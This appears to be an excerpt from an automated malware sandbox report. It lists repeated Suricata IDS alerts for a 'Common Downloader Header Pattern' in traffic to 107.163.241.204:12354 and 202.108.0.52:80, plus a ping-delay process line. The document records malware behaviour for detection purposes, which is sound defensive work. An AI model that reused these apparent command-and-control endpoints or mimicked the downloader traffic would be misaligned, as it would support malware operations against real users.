Source: unknownNetwork traffic detected: HTTP traffic on port 54323 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54419 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56239 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56241 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58669 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58756 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60811 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60813 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62747 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64340 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64411 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51781 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53250 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53449 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54167 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54268 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56076 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56250 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57657 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60035 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60195 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64142 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64288 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65421 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65491 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52585 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52771 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54999 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55132 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56775 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58580 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58639 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60181 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62705 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63434 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63529 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64828 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64971 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53660 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55792 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55930 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57469 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57499 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58794 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59420 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59536 -> 12354
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: global trafficTCP traffic: 192.168.2.9:49750 -> 107.163.241.204:12354
Source: Joe Sandbox ViewIP Address: 202.108.0.52 202.108.0.52
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49887 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49772 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49751 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49796 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49857 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49816 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49842 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49773 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49750 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49814 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49840 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49798 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49815 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49859 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49906 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49932 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50003 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50028 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49983 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49954 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50000 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49979 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50103 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49952 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50127 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50080 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50077 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50177 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50180 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50203 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50150 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50130 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49929 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50152 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49784 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50100 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49860 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50051 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49884 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50153 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49905 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49955 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50102 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49903 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50002 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50050 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50200 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50204 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50032 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50258 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50236 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50255 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50319 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50356 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50320 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50385 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50289 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50386 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50446 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50354 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50233 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50416 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50382 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50571 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50574 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50450 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50810 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50292 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50804 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50317 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50520 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50610 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50731 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50521 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50730 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50615 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51054 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50048 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50451 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51174 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50675 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50681 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50414 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51059 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50487 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50959 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50614 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50862 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50517 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50858 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50726 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50861 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50969 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51165 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50483 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51270 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:51280 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51526 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51656 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51754 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51281 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51398 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51518 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56825 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:53200 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51647 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:62140 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:53196 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:58391 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51746 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:60100 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56943 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:60187 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:56944 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:63952 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50337 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50257 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50887 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:52262 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:55505 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:53380 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56326 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:58996 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56384 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:62599 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:64938 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:59066 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:59064 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:64837 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:60826 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:54341 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56247 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:58881 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49288 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:56006 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:58262 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:52943 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:58345 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49286 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56266 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51413 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:63850 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49927 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:53421 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:57654 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:55715 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:56148 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50952 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50045 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:61837 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:63928 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:58828 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:51528 -> 202.108.0.52:80
